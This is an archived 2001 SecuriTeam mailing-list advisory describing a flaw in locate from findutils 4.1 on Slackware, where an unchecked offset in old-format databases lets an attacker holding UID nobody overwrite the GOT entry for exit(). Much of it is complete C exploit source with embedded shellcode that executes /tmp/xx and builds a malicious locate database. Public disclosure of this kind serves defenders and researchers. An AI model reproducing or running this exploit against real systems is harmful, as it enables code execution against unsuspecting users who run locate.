[EXPL] Security Vulnerability found in /usr/bin/locate (Exploit Code)
From: support@securiteam.comDate: 08/11/01
- Previous message: support@securiteam.com: "[NEWS] SurgeFTP Administrative Account Can be Easily Brute Forced"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Subject: [EXPL] Security Vulnerability found in /usr/bin/locate (Exploit Code) Message-Id: <20010811112302.A857B138BF@mail.der-keiler.de> Date: Sat, 11 Aug 2001 13:23:02 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Security Vulnerability found in /usr/bin/locate (Exploit Code)
------------------------------------------------------------------------
SUMMARY
Slackware, and possibly other distributions, suffer from a security
vulnerability that enables attackers to modify the locate database if they
are able to obtain UID nobody.
This allows attackers to 'Trojan' the locate utility, having anyone who
executes it unknowingly execute potentially malicious code.
DETAILS
Vulnerable systems:
findutils version 4.1
Slackware 7.1
Slackware 8.0
The attack works by taking advantage of the fact locate accepts old format
databases. LOCATEDB_OLD_ESCAPE (char 30) is followed by an offset, stored
in a signed integer, specifying how many characters to add to the current
character pointer in the path. It does not perform any sanity checks of
the input. This exploit tells it to move the pointer back a long way, back
past the beginning of the string, all the way to the GOT address for
exit() which then gets the address of the shell code added, and the
program then runs out of database and executes our code. There might be a
similar vulnerability in the new format.
Exploit:
#include <stdio.h>
char shellcode[] =
"\xeb\x18\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46"
"\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80"
"\xe8\xe3\xff\xff\xff/tmp/xx";
char putshell[] =
"\x14\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c"
"\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96";
int main(void)
{
int i;
int z0=0; int addr=0x0804a970;
int z1=0; int addr2=-626;
int z2=0; int addr3=addr+6;
printf("%s", &addr);
printf("%s", &addr3);
printf("%s",shellcode);
fflush(stdout);
for(i=46;i<256;i++) putchar('A');
printf("%s", putshell);
fflush(stdout);
putchar(0);
putchar(30);
printf("%s", &addr2);
printf("\x82\x83");
fflush(stdout);
}
ADDITIONAL INFORMATION
The information has been provided by
<mailto:josh@viper.falcon-networks.com> Josh,
<mailto:lockdown@lockeddown.net> lockdown and <mailto:zen-parse@gmx.net>
zen-parse.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NEWS] SurgeFTP Administrative Account Can be Easily Brute Forced"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
